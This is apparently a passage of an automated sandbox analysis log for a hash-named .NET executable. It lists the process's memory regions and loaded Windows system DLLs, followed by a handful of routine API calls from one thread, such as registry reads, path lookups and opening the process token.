filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 1801
start_va = 0x75be0000
end_va = 0x76829fff
monitored = 0
entry_point = 0x75c61601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1802
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1803
start_va = 0x748d0000
end_va = 0x748dafff
monitored = 0
entry_point = 0x748d1992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1804
start_va = 0x4fe0000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fe0000"
filename = ""
Region:
id = 1805
start_va = 0x6f7d0000
end_va = 0x6f7e6fff
monitored = 0
entry_point = 0x6f7d35fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1806
start_va = 0x738e0000
end_va = 0x738f6fff
monitored = 0
entry_point = 0x738e3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1807
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1808
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1809
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1810
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1811
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1812
start_va = 0x738a0000
end_va = 0x738dafff
monitored = 0
entry_point = 0x738a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1813
start_va = 0xc50000
end_va = 0xcd1fff
monitored = 0
entry_point = 0xc519a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1814
start_va = 0xc50000
end_va = 0xcd1fff
monitored = 0
entry_point = 0xc519a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1815
start_va = 0x6eba0000
end_va = 0x6ec23fff
monitored = 0
entry_point = 0x6eba19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1816
start_va = 0x4fe0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fe0000"
filename = ""
Region:
id = 1817
start_va = 0x51d0000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051d0000"
filename = ""
Region:
id = 1818
start_va = 0x6b1b0000
end_va = 0x6b753fff
monitored = 1
entry_point = 0x6b73b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1819
start_va = 0x3a0000
end_va = 0x3a1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 1820
start_va = 0x739f0000
end_va = 0x73a02fff
monitored = 0
entry_point = 0x739f1d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1821
start_va = 0x3c0000
end_va = 0x3c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 1822
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1823
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1832
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1833
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1834
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1838
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1841
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1842
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1843
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1844
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1845
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1846
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1847
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1848
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1849
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1860
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1861
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1862
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1863
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1864
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1867
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1869
start_va = 0x1090000
end_va = 0x118ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1875
start_va = 0x6ea90000
end_va = 0x6eb94fff
monitored = 1
entry_point = 0x6eac9680
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\diasymreader.dll")
Region:
id = 1926
start_va = 0xc70000
end_va = 0xcaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 1927
start_va = 0x5090000
end_va = 0x518ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 1928
start_va = 0x51c0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051c0000"
filename = ""
Region:
id = 1929
start_va = 0x747a0000
end_va = 0x747adfff
monitored = 0
entry_point = 0x747a1235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1930
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1931
start_va = 0xcb0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cb0000"
filename = ""
Region:
id = 1932
start_va = 0xee0000
end_va = 0xf1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 1933
start_va = 0x5280000
end_va = 0x537ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005280000"
filename = ""
Region:
id = 1934
start_va = 0x5490000
end_va = 0x558ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005490000"
filename = ""
Region:
id = 1935
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1936
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 2072
start_va = 0x500000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 2073
start_va = 0x660000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 2074
start_va = 0xcf0000
end_va = 0xd2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2075
start_va = 0x5600000
end_va = 0x56fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005600000"
filename = ""
Region:
id = 2076
start_va = 0x7ef3d000
end_va = 0x7ef3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef3d000"
filename = ""
Region:
id = 2077
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 2078
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2079
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2080
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2081
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2082
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2083
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2084
start_va = 0xe70000
end_va = 0xed1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 2085
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2086
start_va = 0x3e0000
end_va = 0x3e4fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 2087
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2088
start_va = 0x11d0000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 2089
start_va = 0x1330000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 2090
start_va = 0x7ef3a000
end_va = 0x7ef3cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef3a000"
filename = ""
Region:
id = 2091
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2092
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2093
start_va = 0x4ff0000
end_va = 0x502ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ff0000"
filename = ""
Region:
id = 2094
start_va = 0x5710000
end_va = 0x580ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005710000"
filename = ""
Region:
id = 2095
start_va = 0x7ef37000
end_va = 0x7ef39fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef37000"
filename = ""
Region:
id = 2096
start_va = 0x440000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 2097
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2098
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2099
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2100
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2101
start_va = 0x440000
end_va = 0x446fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2102
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2103
start_va = 0x440000
end_va = 0x446fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2104
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2105
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2106
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2107
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2108
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2109
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2110
start_va = 0x440000
end_va = 0x458fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 2111
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2112
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2113
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2114
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2115
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2116
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2117
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2118
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2119
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2120
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2121
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2122
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2123
start_va = 0x75950000
end_va = 0x75954fff
monitored = 0
entry_point = 0x75951438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 2124
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2125
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2126
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2127
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2128
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2129
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2130
start_va = 0x3f0000
end_va = 0x3f2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 2131
start_va = 0x460000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 2132
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2133
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2134
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 2135
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2136
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2137
start_va = 0x4c30000
end_va = 0x4c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 2138
start_va = 0x4cc0000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 2139
start_va = 0x58f0000
end_va = 0x59effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000058f0000"
filename = ""
Region:
id = 2140
start_va = 0x7ef34000
end_va = 0x7ef36fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef34000"
filename = ""
Region:
id = 2141
start_va = 0x5210000
end_va = 0x524ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005210000"
filename = ""
Region:
id = 2142
start_va = 0x5b50000
end_va = 0x5c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b50000"
filename = ""
Region:
id = 2143
start_va = 0x7ef31000
end_va = 0x7ef33fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef31000"
filename = ""
Region:
id = 2147
start_va = 0x75960000
end_va = 0x75994fff
monitored = 0
entry_point = 0x7596145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 2148
start_va = 0x76960000
end_va = 0x76965fff
monitored = 0
entry_point = 0x76961782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 2150
start_va = 0x747e0000
end_va = 0x7481bfff
monitored = 0
entry_point = 0x747e145d
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 2151
start_va = 0x747d0000
end_va = 0x747d4fff
monitored = 0
entry_point = 0x747d15df
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 2153
start_va = 0x747c0000
end_va = 0x747c5fff
monitored = 0
entry_point = 0x747c1673
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 2159
start_va = 0x8b0000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 2160
start_va = 0x5a10000
end_va = 0x5b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a10000"
filename = ""
Region:
id = 2161
start_va = 0x7ef2e000
end_va = 0x7ef30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef2e000"
filename = ""
Region:
id = 2168
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2169
start_va = 0x4b10000
end_va = 0x4bcffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 2170
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2171
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2173
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2174
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2175
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 2176
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 2177
start_va = 0x5380000
end_va = 0x53fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005380000"
filename = ""
Thread:
id = 17
os_tid = 0x5c0
[0158.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0160.058] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1cf
[0160.059] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1ce
[0160.511] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0160.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e3f0 | out: phkResult=0x28e3f0*=0x0) returned 0x2
[0160.520] RegCloseKey (hKey=0x80000002) returned 0x0
[0160.738] GetCurrentProcess () returned 0xffffffff
[0160.739] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28ea2c | out: TokenHandle=0x28ea2c*=0x40) returned 1
[0160.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x28e4e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
